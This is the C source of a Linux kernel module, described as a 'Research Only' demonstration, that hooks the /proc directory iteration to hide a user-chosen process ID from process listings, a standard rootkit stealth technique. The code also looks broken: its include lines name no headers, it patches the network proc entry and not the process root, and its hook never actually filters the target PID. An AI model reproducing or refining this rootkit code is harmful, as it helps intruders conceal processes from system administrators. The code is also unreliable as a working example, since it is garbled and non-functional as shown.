#include #include #include #include #include #include #include #include #include #include MODULE_AUTHOR("Research Only"); MODULE_DESCRIPTION("Process ID hiding demonstration"); MODULE_VERSION("0.1"); static unsigned int hidden_pid = 0; module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing"); static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *); static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx) { struct dir_context modified_ctx = { .actor = ctx->actor, .pos = ctx->pos }; int ret = orig_proc_pid_readdir(file, &modified_ctx); ctx->pos = modified_ctx.pos; return ret; } static int hook_proc_listdir(void) { struct file_operations *proc_fops; struct proc_dir_entry *proc_root = init_net.proc_net; proc_fops = (struct file_operations *)proc_root->proc_fops; orig_proc_pid_readdir = proc_fops->iterate_shared; proc_fops->iterate_shared = hider_proc_pid_readdir; return 0; } static void unhook_proc_listdir(void) { struct file_operations *proc_fops; struct proc_dir_entry *proc_root = init_net.proc_net; proc_fops = (struct file_operations *)proc_root->proc_fops; if (proc_fops->iterate_shared == hider_proc_pid_readdir) { proc_fops->iterate_shared = orig_proc_pid_readdir; } } static int __init pid_hider_init(void) { printk(KERN_INFO "PID hider: Initializing module\n"); if (hidden_pid == 0) { printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n"); return 0; } printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid); hook_proc_listdir(); return 0; } static void __exit pid_hider_exit(void) { printk(KERN_INFO "PID hider: Unloading module\n"); unhook_proc_listdir(); } module_init(pid_hider_init); module_exit(pid_hider_exit);